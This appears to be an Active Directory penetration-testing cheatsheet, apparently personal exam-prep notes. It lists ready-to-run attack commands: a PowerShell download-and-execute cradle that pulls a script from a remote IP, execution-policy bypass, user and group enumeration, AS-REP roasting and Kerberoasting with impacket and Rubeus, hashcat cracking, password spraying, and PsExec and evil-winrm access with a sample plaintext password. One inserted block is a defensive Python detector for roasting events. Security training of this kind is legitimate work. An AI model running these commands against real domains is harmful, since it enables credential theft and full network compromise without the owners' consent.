AD Cheatsheet

Active Directory Methodology

Mindmap = https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg

AD Enumeration

  • Using net user /domain
  • PowerView (Users and Groups)

Repeated Enumeration

  • Get-NetLoggedon | select UserName ⇒ get all the users logged on the current machine
  • Get-NetSession ⇒ List of active sessions on the current machine
  • Invoke-UserHunter -CheckAccess ⇒ checks if domain admin is logged onto any computers and if we have admin access to those computers

AD Exploitation

  • Kerberoasting
  • AS-REP Roasting
  • Password Spraying using SMB/crackmapexec (after getting creds from kerberoasting/as-rep roasting)
  • Cached AD Credentials using Mimikatz

AD Lateral Movement

  • Port Forwarding / Tunneling
  • Overpass the Hash using Rubeus

Accessing AD machines

  • RDP
  • psexec
  • evil-winrm

Attack Privilege Requirements

  • Kerbrute Enumeration - No domain access required
  • Pass the Ticket - Access as a user to the domain required
  • Kerberoasting - Access as any user required
  • AS-REP Roasting - Access as any user required
  • Golden Ticket - Full domain compromise (domain admin) required
  • Silver Ticket - Service hash required
  • Skeleton Key - Full domain compromise (domain admin) required

AD Enumeration

net commands

net users ⇒ display users from current local machine

net users /domain ⇒ display users from the DC

net groups /domain ⇒ enumerate groups on the DC

net localgroup ⇒ groups on the local machine

net localgroup administrators ⇒ groups that have admin access on the local machine

net group "Domain Admins" /domain ⇒ get users within the Domain Admins group

net group "Client Admins" /domain ⇒ get users within the Client Admins group

Enumeration using PowerView

PowerView.ps1 - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Load and Run PowerView.ps1 script using powershell

IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.1.1/powerview.ps1')

powershell -ep bypass - bypass the execution policy

Import-Module .\PowerView.ps1 - Importing PowerView to memory

Get-NetDomain - Obtaining domain information

Get-NetUser - Querying users in the domain

Get-NetUser | select cn - Querying users using select statement

Get-NetGroup | select cn - Querying groups in the domain using PowerView

Get-NetGroup "Sales Department" | select member - Enumerating the "Sales Department" group

Get-NetComputer | select operatingsystem,dnshostname - Displaying OS and hostname

Find-LocalAdminAccess - Scanning domain to find local administrative privileges for our user

https://book.hacktricks.wiki/en/windows-hardening/basic-powershell-for-pentesters/powerview.html?highlight=powerview#powerviewsharpview

Get-DomainController

Get-DomainComputer | select samaccountname, cn, name

Get-DomainUser | select name, memberof

Get-DomainGroup | select name, member

Get-DomainGroupMember -Identity "Domain Admins"

Get-DomainGroupMember -Identity "Domain Admins" -Recurse

Get-NetLoggedon | select UserName ⇒ get all the users logged on the current machine

Get-NetSession ⇒ List of active sessions on the current machine

Invoke-UserHunter -CheckAccess ⇒ checks if domain admin is logged onto any computers and if we have admin access to those computers

AD Exploitation


AS-REP Roasting

  • On Linux -

    impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete - Using GetNPUsers to perform AS-REP roasting

hashcat --help | grep -i "Kerberos" - Reviewing the correct Hashcat mode

    sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force - Cracking the AS-REP hash with Hashcat

  • On Windows -

    Rubeus - https://github.com/GhostPack/Rubeus

    .\Rubeus.exe asreproast /nowrap

    sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Kerberoasting


Kerberoasting ⇒ Any domain user can request a service ticket (TGS) for a service account ⇒ the service ticket is encrypted with the service account's password hash ⇒ crack the hash offline using hashcat ⇒ spray the recovered password using crackmapexec

  • Windows -

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast - Utilizing Rubeus to perform a Kerberoast attack

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force - Cracking the TGS-REP hash

  • On Linux -

sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete - Using impacket-GetUserSPNs to perform Kerberoasting on Linux

If impacket-GetUserSPNs throws the error "KRB_AP_ERR_SKEW(Clock skew too great)," we need to synchronize the time of the Kali machine with the domain controller. We can use ntpdate or rdate to do so.

Looking for Service Accounts (SPN - Service Principal Name)

If SPN is set ⇒ It is a service account

Get-DomainUser -SPN ⇒ Find service accounts

Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'c:\users\public\HashCapture.txt' -Width 8000 ⇒ get hash

hashcat -m 13100 -o cracked.txt -a 0 hashes.txt rockyou.txt ⇒ crack the hash using hashcat
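A defender-side counterpart to the two roasting techniques above (AS-REP roasting and Kerberoasting): an added example, not part of the original cheatsheet, that flags the audit-log patterns these tools leave on the domain controller. It assumes simplified Security-log records carrying the fields of Event ID 4768 (TGT request, pre-authentication type) and 4769 (service-ticket request, encryption type); the record layout and the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4 = "0x17"  # RC4-HMAC: roasting tools request it because it cracks fastest

def kerberoast_alerts(events, window=timedelta(minutes=5), threshold=3):
    """Accounts requesting RC4 service tickets (Event 4769) for >= threshold
    distinct user SPNs within window; krbtgt and computer ($) SPNs skipped."""
    per_user = defaultdict(list)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4:
            continue
        if e["service"].lower() == "krbtgt" or e["service"].endswith("$"):
            continue
        per_user[e["account"]].append((e["time"], e["service"]))
    alerts = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window over sorted requests
            spns = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(spns) >= threshold:
                alerts[user] = sorted(spns)
                break
    return alerts

def asrep_alerts(events):
    """Accounts whose TGT request (Event 4768) had pre-auth type 0 (none):
    only accounts with 'Do not require Kerberos preauthentication' can."""
    return sorted({e["account"] for e in events
                   if e["id"] == 4768 and e["preauth"] == 0})

def _ev(minute, eid, account, service=None, etype=None, preauth=None):
    return {"time": datetime(2024, 1, 1, 9, minute), "id": eid, "account": account,
            "service": service, "etype": etype, "preauth": preauth}

SAMPLE_EVENTS = [  # constructed records, not real log data
    _ev(0, 4768, "pete", preauth=2),            # normal TGT (PA-ENC-TIMESTAMP)
    _ev(0, 4768, "svc_legacy", preauth=0),      # AS-REP roastable account
    _ev(1, 4769, "pete", "krbtgt", RC4),        # ignored: TGT service
    _ev(1, 4769, "pete", "FILES04$", RC4),      # ignored: computer account
    _ev(1, 4769, "pete", "svc_sql", RC4),       # three RC4 TGS in 3 minutes
    _ev(2, 4769, "pete", "svc_http", RC4),
    _ev(3, 4769, "pete", "svc_backup", RC4),
    _ev(1, 4769, "jen", "svc_sql", "0x12"),     # AES-256: normal use
    _ev(1, 4769, "dave", "svc_sql", RC4),       # two SPNs 30 min apart: no alert
    _ev(31, 4769, "dave", "svc_http", RC4),
]
```

Tune threshold and window to the environment; the RC4 filter matters because a domain that still issues RC4 tickets for everyday logons will otherwise drown the signal.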

PsExec

Sysinternals - https://learn.microsoft.com/en-us/sysinternals/

.\PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd

Linux - impacket-psexec oscp/emmet@10.10.1.202 ⇒ get access to shares and shell on machine

winrm / Evil-winrm

evil-winrm -i <IP> -u <username> -p <password>

Hashcat

Crack passwords after getting hashes from AS-REP roasting or Kerberoasting

hashcat -m 18200 hash.asrep /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Crack Zip files

zip2john it-users.zip ⇒ gives hash of the zip file

john it-users.hash --wordlist=/usr/share/wordlists/rockyou.txt ⇒ crack the hash

Search for local.txt/proof.txt files on Windows

dir /s/b local.txt

dir /s/b proof.txt

dir /s/b *.txt

dir /s/b *.log

local/proof screenshot

type proof.txt

whoami

ipconfig

hostname

=================

Connecting to RDP

xfreerdp3 /u:<username> /d:<domain> /p:<pwd> /v:<IP>
xfreerdp /cert-ignore /u:<uname> /d:<domain> /p:<pwd> /v:<IP>

Hashcat

https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat -m <number> hash wordlists.txt --force

Active Directory

Password Spraying

Crackmapexec - check if the output shows 'Pwned!'

crackmapexec smb <IP or subnet> -u users.txt -p 'pass' -d <domain> --continue-on-success

Kerbrute

kerbrute passwordspray -d corp.com .\usernames.txt "pass"

AS-REP Roasting

Hash of AS-REP Roastable accounts

impacket-GetNPUsers -dc-ip <DC-IP> <domain>/<user>:<pass> -request

Kerberoasting

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast #dumping from compromised windows host, and saving with customname

impacket-GetUserSPNs -dc-ip <DC-IP> <domain>/<user>:<pass> -request #from kali machine

hashcat -m 13100 hashes.txt wordlist.txt --force # cracking hashes